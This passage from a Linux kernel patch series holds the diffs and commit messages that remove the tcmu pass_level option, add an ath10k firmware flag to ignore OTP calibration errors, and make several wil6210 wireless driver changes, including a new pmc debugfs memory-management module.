"dev_size=%u"}, - {Opt_pass_level, "pass_level=%u"}, {Opt_err, NULL} }; @@ -965,7 +954,6 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, char *orig, *ptr, *opts, *arg_p; substring_t args[MAX_OPT_ARGS]; int ret = 0, token; - int arg; opts = kstrdup(page, GFP_KERNEL); if (!opts) @@ -998,16 +986,6 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, if (ret < 0) pr_err("kstrtoul() failed for dev_size=\n"); break; - case Opt_pass_level: - match_int(args, &arg); - if (arg >= TCMU_PASS_INVALID) { - pr_warn("TCMU: Invalid pass_level: %d\n", arg); - break; - } - - pr_debug("TCMU: Setting pass_level to %d\n", arg); - udev->pass_level = arg; - break; default: break; } @@ -1024,8 +1002,7 @@ static ssize_t tcmu_show_configfs_dev_params(struct se_device *dev, char *b) bl = sprintf(b + bl, "Config: %s ", udev->dev_config[0] ? udev->dev_config : "NULL"); - bl += sprintf(b + bl, "Size: %zu PassLevel: %u\n", - udev->dev_size, udev->pass_level); + bl += sprintf(b + bl, "Size: %zu\n", udev->dev_size); return bl; } @@ -1074,46 +1051,7 @@ static struct sbc_ops tcmu_sbc_ops = { static sense_reason_t tcmu_parse_cdb(struct se_cmd *cmd) { - unsigned char *cdb = cmd->t_task_cdb; - struct tcmu_dev *udev = TCMU_DEV(cmd->se_dev); - sense_reason_t ret; - - switch (udev->pass_level) { - case TCMU_PASS_ALL: - /* We're just like pscsi, then */ - /* - * For REPORT LUNS we always need to emulate the response, for everything - * else, pass it up. - */ - switch (cdb[0]) { - case REPORT_LUNS: - cmd->execute_cmd = spc_emulate_report_luns; - break; - case READ_6: - case READ_10: - case READ_12: - case READ_16: - case WRITE_6: - case WRITE_10: - case WRITE_12: - case WRITE_16: - case WRITE_VERIFY: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - /* FALLTHROUGH */ - default: - cmd->execute_cmd = tcmu_pass_op; - } - ret = TCM_NO_SENSE; - break; - case TCMU_PASS_IO: - ret = sbc_parse_cdb(cmd, &tcmu_sbc_ops); - break; - default: - pr_err("Unknown tcm-user pass level %d\n", udev->pass_level); - ret = TCM_CHECK_CONDITION_ABORT_CMD; - } - - return ret; + return sbc_parse_cdb(cmd, &tcmu_sbc_ops); } DEF_TB_DEFAULT_ATTRIBS(tcmu); From d915354675a3baae834c9aae845bbb7a0fcd453d Mon Sep 17 00:00:00 2001 From: Kalle Valo Date: Tue, 28 Apr 2015 20:19:30 +0300 Subject: [PATCH 014/872] ath10k: add ATH10K_FW_FEATURE_IGNORE_OTP_RESULT qca6174 otp binary seems to always return an error to the host, even if the calibration succeeded. Add a firmware feature flag to detect if the firmware image which have this problem and workaround the issue in ath10k by ignoring the error code. I was also considering making this hw specific flag but as this is strictly a firmware issue it's best to handle this via a firmware feature flag so that it will be easy to disable the workaround. Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/core.c | 4 +++- drivers/net/wireless/ath/ath10k/core.h | 3 +++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/ath10k/core.c b/drivers/net/wireless/ath/ath10k/core.c index 987b266278a8..bcccae19325d 100644 --- a/drivers/net/wireless/ath/ath10k/core.c +++ b/drivers/net/wireless/ath/ath10k/core.c @@ -387,7 +387,9 @@ static int ath10k_download_and_run_otp(struct ath10k *ar) ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot otp execute result %d\n", result); - if (!skip_otp && result != 0) { + if (!(skip_otp || test_bit(ATH10K_FW_FEATURE_IGNORE_OTP_RESULT, + ar->fw_features)) + && result != 0) { ath10k_err(ar, "otp calibration failed: %d", result); return -EINVAL; } diff --git a/drivers/net/wireless/ath/ath10k/core.h b/drivers/net/wireless/ath/ath10k/core.h index 8444adf42195..827b3d79ed0c 100644 --- a/drivers/net/wireless/ath/ath10k/core.h +++ b/drivers/net/wireless/ath/ath10k/core.h @@ -460,6 +460,9 @@ enum ath10k_fw_features { */ ATH10K_FW_FEATURE_WOWLAN_SUPPORT = 6, + /* Don't trust error code from otp.bin */ + ATH10K_FW_FEATURE_IGNORE_OTP_RESULT, + /* keep last */ ATH10K_FW_FEATURE_COUNT, }; From a54a40dae67e4ee04df4dc36e7b89639131dd8e3 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:05 +0300 Subject: [PATCH 015/872] wil6210: increase timeout for the "echo" command Sometimes it takes for the firmware more than 20ms to react on "echo" command after reset. Increase timeout from 20 to 50ms Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/wmi.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/wil6210/wmi.c b/drivers/net/wireless/ath/wil6210/wmi.c index 9fe2085be2c5..04fad5f4bbea 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.c +++ b/drivers/net/wireless/ath/wil6210/wmi.c @@ -844,7 +844,7 @@ int wmi_echo(struct wil6210_priv *wil) }; return wmi_call(wil, WMI_ECHO_CMDID, &cmd, sizeof(cmd), - WMI_ECHO_RSP_EVENTID, NULL, 0, 20); + WMI_ECHO_RSP_EVENTID, NULL, 0, 50); } int wmi_set_mac_address(struct wil6210_priv *wil, void *addr) From 48c963af7432f974348d9a006914dbaf5e7c7140 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:06 +0300 Subject: [PATCH 016/872] wil6210: update Rx descriptor fields Rx descriptor fields accordingly to the updated hardware documentation Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/txrx.c | 2 +- drivers/net/wireless/ath/wil6210/txrx.h | 24 ++++++++++++++++-------- 2 files changed, 17 insertions(+), 9 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/txrx.c b/drivers/net/wireless/ath/wil6210/txrx.c index e8bd512d81a9..1fd34e5e9824 100644 --- a/drivers/net/wireless/ath/wil6210/txrx.c +++ b/drivers/net/wireless/ath/wil6210/txrx.c @@ -236,7 +236,7 @@ static int wil_vring_alloc_skb(struct wil6210_priv *wil, struct vring *vring, return -ENOMEM; } - d->dma.d0 = BIT(9) | RX_DMA_D0_CMD_DMA_IT; + d->dma.d0 = RX_DMA_D0_CMD_DMA_RT | RX_DMA_D0_CMD_DMA_IT; wil_desc_addr_set(&d->dma.addr, pa); /* ip_length don't care */ /* b11 don't care */ diff --git a/drivers/net/wireless/ath/wil6210/txrx.h b/drivers/net/wireless/ath/wil6210/txrx.h index d90c8aa20c15..0c4638487c74 100644 --- a/drivers/net/wireless/ath/wil6210/txrx.h +++ b/drivers/net/wireless/ath/wil6210/txrx.h @@ -384,19 +384,27 @@ struct vring_rx_mac { * [word 7] length */ -#define RX_DMA_D0_CMD_DMA_IT BIT(10) - -/* Error field, offload bits */ -#define RX_DMA_ERROR_L3_ERR BIT(4) -#define RX_DMA_ERROR_L4_ERR BIT(5) +#define RX_DMA_D0_CMD_DMA_EOP BIT(8) +#define RX_DMA_D0_CMD_DMA_RT BIT(9) /* always 1 */ +#define RX_DMA_D0_CMD_DMA_IT BIT(10) /* interrupt */ + +/* Error field */ +#define RX_DMA_ERROR_FCS BIT(0) +#define RX_DMA_ERROR_MIC BIT(1) +#define RX_DMA_ERROR_KEY BIT(2) /* Key missing */ +#define RX_DMA_ERROR_REPLAY BIT(3) +#define RX_DMA_ERROR_L3_ERR BIT(4) +#define RX_DMA_ERROR_L4_ERR BIT(5) /* Status field */ -#define RX_DMA_STATUS_DU BIT(0) -#define RX_DMA_STATUS_ERROR BIT(2) - +#define RX_DMA_STATUS_DU BIT(0) +#define RX_DMA_STATUS_EOP BIT(1) +#define RX_DMA_STATUS_ERROR BIT(2) +#define RX_DMA_STATUS_MI BIT(3) /* MAC Interrupt is asserted */ #define RX_DMA_STATUS_L3I BIT(4) #define RX_DMA_STATUS_L4I BIT(5) #define RX_DMA_STATUS_PHY_INFO BIT(6) +#define RX_DMA_STATUS_FFM BIT(7) /* EtherType Flex Filter Match */ struct vring_rx_dma { u32 d0; From bb6c8dccfe2302a97d8edd4ba5e6234a8fd3c626 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:07 +0300 Subject: [PATCH 017/872] wil6210: fix boot loader "ready" indication Boot loader "ready" indication has changed from "bit0 set" to "only bit0 set". This is to address hardware glitches. Due to glitches, sometimes right after reset register reads 0xffffffff, or (rarely) other garbage. Reflect this in the driver Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/main.c | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index 0623d8c98956..146fd8088fde 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -551,7 +551,7 @@ static inline void wil_release_cpu(struct wil6210_priv *wil) static int wil_target_reset(struct wil6210_priv *wil) { int delay = 0; - u32 x; + u32 x, x1 = 0; wil_dbg_misc(wil, "Resetting \"%s\"...\n", wil->hw_name); @@ -606,12 +606,16 @@ static int wil_target_reset(struct wil6210_priv *wil) do { msleep(RST_DELAY); x = R(RGF_USER_BL + offsetof(struct RGF_BL, ready)); + if (x1 != x) { + wil_dbg_misc(wil, "BL.ready 0x%08x => 0x%08x\n", x1, x); + x1 = x; + } if (delay++ > RST_COUNT) { wil_err(wil, "Reset not completed, bl.ready 0x%08x\n", x); return -ETIME; } - } while (!(x & BIT_BL_READY)); + } while (x != BIT_BL_READY); C(RGF_USER_CLKS_CTL_0, BIT_USER_CLKS_RST_PWGD); From 1e7e5a0d318229b5ad12efeee690b8d0d5c980ff Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:08 +0300 Subject: [PATCH 018/872] wil6210: fix for probe_resp IE's Parameters for the start_ap and change_bcon contains probe response template and probe response IE's. supplicant puts in the proberesp_ies only WPS related IE's, while firmware need all IE's, most notable is RSN that is not included in the proberesp_ies. Always use IE's provided by the bcon->probe_resp Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 31 ++++++++++++++------- 1 file changed, 21 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index ea331e407e7f..f53a1908fae2 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -669,11 +669,6 @@ static int wil_fix_bcon(struct wil6210_priv *wil, if (bcon->probe_resp_len <= hlen) return 0; - if (!bcon->proberesp_ies) { - bcon->proberesp_ies = f->u.probe_resp.variable; - bcon->proberesp_ies_len = bcon->probe_resp_len - hlen; - rc = 1; - } if (!bcon->assocresp_ies) { bcon->assocresp_ies = f->u.probe_resp.variable; bcon->assocresp_ies_len = bcon->probe_resp_len - hlen; @@ -688,9 +683,19 @@ static int wil_cfg80211_change_beacon(struct wiphy *wiphy, struct cfg80211_beacon_data *bcon) { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + struct ieee80211_mgmt *f = (struct ieee80211_mgmt *)bcon->probe_resp; + size_t hlen = offsetof(struct ieee80211_mgmt, u.probe_resp.variable); + const u8 *pr_ies = NULL; + size_t pr_ies_len = 0; int rc; wil_dbg_misc(wil, "%s()\n", __func__); + wil_print_bcon_data(bcon); + + if (bcon->probe_resp_len > hlen) { + pr_ies = f->u.probe_resp.variable; + pr_ies_len = bcon->probe_resp_len - hlen; + } if (wil_fix_bcon(wil, bcon)) { wil_dbg_misc(wil, "Fixed bcon\n"); @@ -703,9 +708,7 @@ static int wil_cfg80211_change_beacon(struct wiphy *wiphy, * wmi_set_ie(wil, WMI_FRAME_BEACON, bcon->beacon_ies_len, * bcon->beacon_ies); */ - rc = wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, - bcon->proberesp_ies_len, - bcon->proberesp_ies); + rc = wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, pr_ies_len, pr_ies); if (rc) { wil_err(wil, "set_ie(PROBE_RESP) failed\n"); return rc; @@ -733,6 +736,10 @@ static int wil_cfg80211_start_ap(struct wiphy *wiphy, struct cfg80211_beacon_data *bcon = &info->beacon; struct cfg80211_crypto_settings *crypto = &info->crypto; u8 wmi_nettype = wil_iftype_nl2wmi(wdev->iftype); + struct ieee80211_mgmt *f = (struct ieee80211_mgmt *)bcon->probe_resp; + size_t hlen = offsetof(struct ieee80211_mgmt, u.probe_resp.variable); + const u8 *pr_ies = NULL; + size_t pr_ies_len = 0; wil_dbg_misc(wil, "%s()\n", __func__); @@ -752,6 +759,11 @@ static int wil_cfg80211_start_ap(struct wiphy *wiphy, wil_print_bcon_data(bcon); wil_print_crypto(wil, crypto); + if (bcon->probe_resp_len > hlen) { + pr_ies = f->u.probe_resp.variable; + pr_ies_len = bcon->probe_resp_len - hlen; + } + if (wil_fix_bcon(wil, bcon)) { wil_dbg_misc(wil, "Fixed bcon\n"); wil_print_bcon_data(bcon); @@ -779,8 +791,7 @@ static int wil_cfg80211_start_ap(struct wiphy *wiphy, * wmi_set_ie(wil, WMI_FRAME_BEACON, bcon->beacon_ies_len, * bcon->beacon_ies); */ - wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, bcon->proberesp_ies_len, - bcon->proberesp_ies); + wmi_set_ie(wil, WMI_FRAME_PROBE_RESP, pr_ies_len, pr_ies); wmi_set_ie(wil, WMI_FRAME_ASSOC_RESP, bcon->assocresp_ies_len, bcon->assocresp_ies); From dc16427bbe65aeec416f490df73cdeeef5ab62c0 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:09 +0300 Subject: [PATCH 019/872] wil6210: Add pmc debug mechanism memory management Pmc is a hardware debug mechanism which allows capturing phy data, packets, and internally generated events and messages synchronized and time stamped by the hardware. It requires memory buffers allocated by the driver in order to be used by hardware dma to upstream real time debug data to host memory. Driver will handle memory allocation and release, and fetching the data from the memory to application layer via debug file system. The configuration of pmc is handled entirely by the application layer. Signed-off-by: Vladimir Shulman Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/Makefile | 1 + drivers/net/wireless/ath/wil6210/debugfs.c | 93 +++++ drivers/net/wireless/ath/wil6210/pmc.c | 375 +++++++++++++++++++++ drivers/net/wireless/ath/wil6210/pmc.h | 27 ++ drivers/net/wireless/ath/wil6210/wil6210.h | 14 + drivers/net/wireless/ath/wil6210/wmi.h | 15 + 6 files changed, 525 insertions(+) create mode 100644 drivers/net/wireless/ath/wil6210/pmc.c create mode 100644 drivers/net/wireless/ath/wil6210/pmc.h diff --git a/drivers/net/wireless/ath/wil6210/Makefile b/drivers/net/wireless/ath/wil6210/Makefile index caa717bf52f3..050506f842e9 100644 --- a/drivers/net/wireless/ath/wil6210/Makefile +++ b/drivers/net/wireless/ath/wil6210/Makefile @@ -12,6 +12,7 @@ wil6210-y += debug.o wil6210-y += rx_reorder.o wil6210-y += ioctl.o wil6210-y += fw.o +wil6210-y += pmc.o wil6210-$(CONFIG_WIL6210_TRACING) += trace.o wil6210-y += wil_platform.o wil6210-y += ethtool.o diff --git a/drivers/net/wireless/ath/wil6210/debugfs.c b/drivers/net/wireless/ath/wil6210/debugfs.c index bbc22d88f78f..19f77e55dc53 100644 --- a/drivers/net/wireless/ath/wil6210/debugfs.c +++ b/drivers/net/wireless/ath/wil6210/debugfs.c @@ -24,6 +24,7 @@ #include "wil6210.h" #include "wmi.h" #include "txrx.h" +#include "pmc.h" /* Nasty hack. Better have per device instances */ static u32 mem_addr; @@ -702,6 +703,89 @@ static const struct file_operations fops_back = { .open = simple_open, }; +/* pmc control, write: + * - "alloc " to allocate PMC + * - "free" to release memory allocated for PMC + */ +static ssize_t wil_write_pmccfg(struct file *file, const char __user *buf, + size_t len, loff_t *ppos) +{ + struct wil6210_priv *wil = file->private_data; + int rc; + char *kbuf = kmalloc(len + 1, GFP_KERNEL); + char cmd[9]; + int num_descs, desc_size; + + if (!kbuf) + return -ENOMEM; + + rc = simple_write_to_buffer(kbuf, len, ppos, buf, len); + if (rc != len) { + kfree(kbuf); + return rc >= 0 ? -EIO : rc; + } + + kbuf[len] = '\0'; + rc = sscanf(kbuf, "%8s %d %d", cmd, &num_descs, &desc_size); + kfree(kbuf); + + if (rc < 0) + return rc; + + if (rc < 1) { + wil_err(wil, "pmccfg: no params given\n"); + return -EINVAL; + } + + if (0 == strcmp(cmd, "alloc")) { + if (rc != 3) { + wil_err(wil, "pmccfg: alloc requires 2 params\n"); + return -EINVAL; + } + wil_pmc_alloc(wil, num_descs, desc_size); + } else if (0 == strcmp(cmd, "free")) { + if (rc != 1) { + wil_err(wil, "pmccfg: free does not have any params\n"); + return -EINVAL; + } + wil_pmc_free(wil, true); + } else { + wil_err(wil, "pmccfg: Unrecognized command \"%s\"\n", cmd); + return -EINVAL; + } + + return len; +} + +static ssize_t wil_read_pmccfg(struct file *file, char __user *user_buf, + size_t count, loff_t *ppos) +{ + struct wil6210_priv *wil = file->private_data; + char text[256]; + char help[] = "pmc control, write:\n" + " - \"alloc \" to allocate pmc\n" + " - \"free\" to free memory allocated for pmc\n"; + + sprintf(text, "Last command status: %d\n\n%s", + wil_pmc_last_cmd_status(wil), + help); + + return simple_read_from_buffer(user_buf, count, ppos, text, + strlen(text) + 1); +} + +static const struct file_operations fops_pmccfg = { + .read = wil_read_pmccfg, + .write = wil_write_pmccfg, + .open = simple_open, +}; + +static const struct file_operations fops_pmcdata = { + .open = simple_open, + .read = wil_pmc_read, + .llseek = wil_pmc_llseek, +}; + /*---tx_mgmt---*/ /* Write mgmt frame to this file to send it */ static ssize_t wil_write_file_txmgmt(struct file *file, const char __user *buf, @@ -1363,6 +1447,8 @@ static const struct { {"tx_mgmt", S_IWUSR, &fops_txmgmt}, {"wmi_send", S_IWUSR, &fops_wmi}, {"back", S_IRUGO | S_IWUSR, &fops_back}, + {"pmccfg", S_IRUGO | S_IWUSR, &fops_pmccfg}, + {"pmcdata", S_IRUGO, &fops_pmcdata}, {"temp", S_IRUGO, &fops_temp}, {"freq", S_IRUGO, &fops_freq}, {"link", S_IRUGO, &fops_link}, @@ -1440,6 +1526,8 @@ int wil6210_debugfs_init(struct wil6210_priv *wil) if (IS_ERR_OR_NULL(dbg)) return -ENODEV; + wil_pmc_init(wil); + wil6210_debugfs_init_files(wil, dbg); wil6210_debugfs_init_isr(wil, dbg); wil6210_debugfs_init_blobs(wil, dbg); @@ -1459,4 +1547,9 @@ void wil6210_debugfs_remove(struct wil6210_priv *wil) { debugfs_remove_recursive(wil->debug); wil->debug = NULL; + + /* free pmc memory without sending command to fw, as it will + * be reset on the way down anyway + */ + wil_pmc_free(wil, false); } diff --git a/drivers/net/wireless/ath/wil6210/pmc.c b/drivers/net/wireless/ath/wil6210/pmc.c new file mode 100644 index 000000000000..3cb4f35ebd05 --- /dev/null +++ b/drivers/net/wireless/ath/wil6210/pmc.c @@ -0,0 +1,375 @@ +/* + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +#include +#include +#include +#include "wmi.h" +#include "wil6210.h" +#include "txrx.h" +#include "pmc.h" + +struct desc_alloc_info { + dma_addr_t pa; + void *va; +}; + +static int wil_is_pmc_allocated(struct pmc_ctx *pmc) +{ + return !!pmc->pring_va; +} + +void wil_pmc_init(struct wil6210_priv *wil) +{ + memset(&wil->pmc, 0, sizeof(struct pmc_ctx)); + mutex_init(&wil->pmc.lock); +} + +/** + * Allocate the physical ring (p-ring) and the required + * number of descriptors of required size. + * Initialize the descriptors as required by pmc dma. + * The descriptors' buffers dwords are initialized to hold + * dword's serial number in the lsw and reserved value + * PCM_DATA_INVALID_DW_VAL in the msw. + */ +void wil_pmc_alloc(struct wil6210_priv *wil, + int num_descriptors, + int descriptor_size) +{ + u32 i; + struct pmc_ctx *pmc = &wil->pmc; + struct device *dev = wil_to_dev(wil); + struct wmi_pmc_cmd pmc_cmd = {0}; + + mutex_lock(&pmc->lock); + + if (wil_is_pmc_allocated(pmc)) { + /* sanity check */ + wil_err(wil, "%s: ERROR pmc is already allocated\n", __func__); + goto no_release_err; + } + + pmc->num_descriptors = num_descriptors; + pmc->descriptor_size = descriptor_size; + + wil_dbg_misc(wil, "%s: %d descriptors x %d bytes each\n", + __func__, num_descriptors, descriptor_size); + + /* allocate descriptors info list in pmc context*/ + pmc->descriptors = kcalloc(num_descriptors, + sizeof(struct desc_alloc_info), + GFP_KERNEL); + if (!pmc->descriptors) { + wil_err(wil, "%s: ERROR allocating pmc skb list\n", __func__); + goto no_release_err; + } + + wil_dbg_misc(wil, + "%s: allocated descriptors info list %p\n", + __func__, pmc->descriptors); + + /* Allocate pring buffer and descriptors. + * vring->va should be aligned on its size rounded up to power of 2 + * This is granted by the dma_alloc_coherent + */ + pmc->pring_va = dma_alloc_coherent(dev, + sizeof(struct vring_tx_desc) * num_descriptors, + &pmc->pring_pa, + GFP_KERNEL); + + wil_dbg_misc(wil, + "%s: allocated pring %p. %zd x %d = total %zd bytes\n", + __func__, + (void *)pmc->pring_pa, + sizeof(struct vring_tx_desc), + num_descriptors, + sizeof(struct vring_tx_desc) * num_descriptors); + + if (!pmc->pring_va) { + wil_err(wil, "%s: ERROR allocating pmc pring\n", __func__); + goto release_pmc_skb_list; + } + + /* initially, all descriptors are SW owned + * For Tx, Rx, and PMC, ownership bit is at the same location, thus + * we can use any + */ + for (i = 0; i < num_descriptors; i++) { + struct vring_tx_desc *_d = &pmc->pring_va[i]; + struct vring_tx_desc dd, *d = ⅆ + int j = 0; + + pmc->descriptors[i].va = dma_alloc_coherent(dev, + descriptor_size, + &pmc->descriptors[i].pa, + GFP_KERNEL); + + if (unlikely(!pmc->descriptors[i].va)) { + wil_err(wil, + "%s: ERROR allocating pmc descriptor %d", + __func__, i); + goto release_pmc_skbs; + } + + for (j = 0; j < descriptor_size / sizeof(u32); j++) { + u32 *p = (u32 *)pmc->descriptors[i].va + j; + *p = PCM_DATA_INVALID_DW_VAL | j; + } + + /* configure dma descriptor */ + d->dma.addr.addr_low = + cpu_to_le32(lower_32_bits(pmc->descriptors[i].pa)); + d->dma.addr.addr_high = + cpu_to_le16((u16)upper_32_bits(pmc->descriptors[i].pa)); + d->dma.status = 0; /* 0 = HW_OWNED */ + d->dma.length = cpu_to_le16(descriptor_size); + d->dma.d0 = BIT(9) | RX_DMA_D0_CMD_DMA_IT; + *_d = *d; + } + + wil_dbg_misc(wil, "%s: allocated successfully\n", __func__); + + pmc_cmd.op = WMI_PMC_ALLOCATE; + pmc_cmd.ring_size = cpu_to_le16(pmc->num_descriptors); + pmc_cmd.mem_base = cpu_to_le64(pmc->pring_pa); + + wil_dbg_misc(wil, "%s: send WMI_PMC_CMD with ALLOCATE op\n", __func__); + pmc->last_cmd_status = wmi_send(wil, + WMI_PMC_CMDID, + &pmc_cmd, + sizeof(pmc_cmd)); + if (pmc->last_cmd_status) { + wil_err(wil, + "%s: WMI_PMC_CMD with ALLOCATE op failed with status %d", + __func__, pmc->last_cmd_status); + goto release_pmc_skbs; + } + + mutex_unlock(&pmc->lock); + + return; + +release_pmc_skbs: + wil_err(wil, "%s: exit on error: Releasing skbs...\n", __func__); + for (i = 0; pmc->descriptors[i].va && i < num_descriptors; i++) { + dma_free_coherent(dev, + descriptor_size, + pmc->descriptors[i].va, + pmc->descriptors[i].pa); + + pmc->descriptors[i].va = NULL; + } + wil_err(wil, "%s: exit on error: Releasing pring...\n", __func__); + + dma_free_coherent(dev, + sizeof(struct vring_tx_desc) * num_descriptors, + pmc->pring_va, + pmc->pring_pa); + + pmc->pring_va = NULL; + +release_pmc_skb_list: + wil_err(wil, "%s: exit on error: Releasing descriptors info list...\n", + __func__); + kfree(pmc->descriptors); + pmc->descriptors = NULL; + +no_release_err: + pmc->last_cmd_status = -ENOMEM; + mutex_unlock(&pmc->lock); +} + +/** + * Traverse the p-ring and release all buffers. + * At the end release the p-ring memory + */ +void wil_pmc_free(struct wil6210_priv *wil, int send_pmc_cmd) +{ + struct pmc_ctx *pmc = &wil->pmc; + struct device *dev = wil_to_dev(wil); + struct wmi_pmc_cmd pmc_cmd = {0}; + + mutex_lock(&pmc->lock); + + pmc->last_cmd_status = 0; + + if (!wil_is_pmc_allocated(pmc)) { + wil_dbg_misc(wil, "%s: Error, can't free - not allocated\n", + __func__); + pmc->last_cmd_status = -EPERM; + mutex_unlock(&pmc->lock); + return; + } + + if (send_pmc_cmd) { + wil_dbg_misc(wil, "%s: send WMI_PMC_CMD with RELEASE op\n", + __func__); + pmc_cmd.op = WMI_PMC_RELEASE; + pmc->last_cmd_status = + wmi_send(wil, WMI_PMC_CMDID, &pmc_cmd, + sizeof(pmc_cmd)); + if (pmc->last_cmd_status) { + wil_err(wil, + "%s WMI_PMC_CMD with RELEASE op failed, status %d", + __func__, pmc->last_cmd_status); + /* There's nothing we can do with this error. + * Normally, it should never occur. + * Continue to freeing all memory allocated for pmc. + */ + } + } + + if (pmc->pring_va) { + size_t buf_size = sizeof(struct vring_tx_desc) * + pmc->num_descriptors; + + wil_dbg_misc(wil, "%s: free pring va %p\n", + __func__, pmc->pring_va); + dma_free_coherent(dev, buf_size, pmc->pring_va, pmc->pring_pa); + + pmc->pring_va = NULL; + } else { + pmc->last_cmd_status = -ENOENT; + } + + if (pmc->descriptors) { + int i; + + for (i = 0; + pmc->descriptors[i].va && i < pmc->num_descriptors; i++) { + dma_free_coherent(dev, + pmc->descriptor_size, + pmc->descriptors[i].va, + pmc->descriptors[i].pa); + pmc->descriptors[i].va = NULL; + } + wil_dbg_misc(wil, "%s: free descriptor info %d/%d\n", + __func__, i, pmc->num_descriptors); + wil_dbg_misc(wil, + "%s: free pmc descriptors info list %p\n", + __func__, pmc->descriptors); + kfree(pmc->descriptors); + pmc->descriptors = NULL; + } else { + pmc->last_cmd_status = -ENOENT; + } + + mutex_unlock(&pmc->lock); +} + +/** + * Status of the last operation requested via debugfs: alloc/free/read. + * 0 - success or negative errno + */ +int wil_pmc_last_cmd_status(struct wil6210_priv *wil) +{ + wil_dbg_misc(wil, "%s: status %d\n", __func__, + wil->pmc.last_cmd_status); + + return wil->pmc.last_cmd_status; +} + +/** + * Read from required position up to the end of current descriptor, + * depends on descriptor size configured during alloc request. + */ +ssize_t wil_pmc_read(struct file *filp, char __user *buf, size_t count, + loff_t *f_pos) +{ + struct wil6210_priv *wil = filp->private_data; + struct pmc_ctx *pmc = &wil->pmc; + size_t retval = 0; + unsigned long long idx; + loff_t offset; + size_t pmc_size = pmc->descriptor_size * pmc->num_descriptors; + + mutex_lock(&pmc->lock); + + if (!wil_is_pmc_allocated(pmc)) { + wil_err(wil, "%s: error, pmc is not allocated!\n", __func__); + pmc->last_cmd_status = -EPERM; + mutex_unlock(&pmc->lock); + return -EPERM; + } + + wil_dbg_misc(wil, + "%s: size %u, pos %lld\n", + __func__, (unsigned)count, *f_pos); + + pmc->last_cmd_status = 0; + + idx = *f_pos; + do_div(idx, pmc->descriptor_size); + offset = *f_pos - (idx * pmc->descriptor_size); + + if (*f_pos >= pmc_size) { + wil_dbg_misc(wil, "%s: reached end of pmc buf: %lld >= %u\n", + __func__, *f_pos, (unsigned)pmc_size); + pmc->last_cmd_status = -ERANGE; + goto out; + } + + wil_dbg_misc(wil, + "%s: read from pos %lld (descriptor %llu, offset %llu) %zu bytes\n", + __func__, *f_pos, idx, offset, count); + + /* if no errors, return the copied byte count */ + retval = simple_read_from_buffer(buf, + count, + &offset, + pmc->descriptors[idx].va, + pmc->descriptor_size); + *f_pos += retval; +out: + mutex_unlock(&pmc->lock); + + return retval; +} + +loff_t wil_pmc_llseek(struct file *filp, loff_t off, int whence) +{ + loff_t newpos; + struct wil6210_priv *wil = filp->private_data; + struct pmc_ctx *pmc = &wil->pmc; + size_t pmc_size = pmc->descriptor_size * pmc->num_descriptors; + + switch (whence) { + case 0: /* SEEK_SET */ + newpos = off; + break; + + case 1: /* SEEK_CUR */ + newpos = filp->f_pos + off; + break; + + case 2: /* SEEK_END */ + newpos = pmc_size; + break; + + default: /* can't happen */ + return -EINVAL; + } + + if (newpos < 0) + return -EINVAL; + if (newpos > pmc_size) + newpos = pmc_size; + + filp->f_pos = newpos; + + return newpos; +} diff --git a/drivers/net/wireless/ath/wil6210/pmc.h b/drivers/net/wireless/ath/wil6210/pmc.h new file mode 100644 index 000000000000..bebc8d52e1e6 --- /dev/null +++ b/drivers/net/wireless/ath/wil6210/pmc.h @@ -0,0 +1,27 @@ +/* + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. + * + * Permission to use, copy, modify, and/or 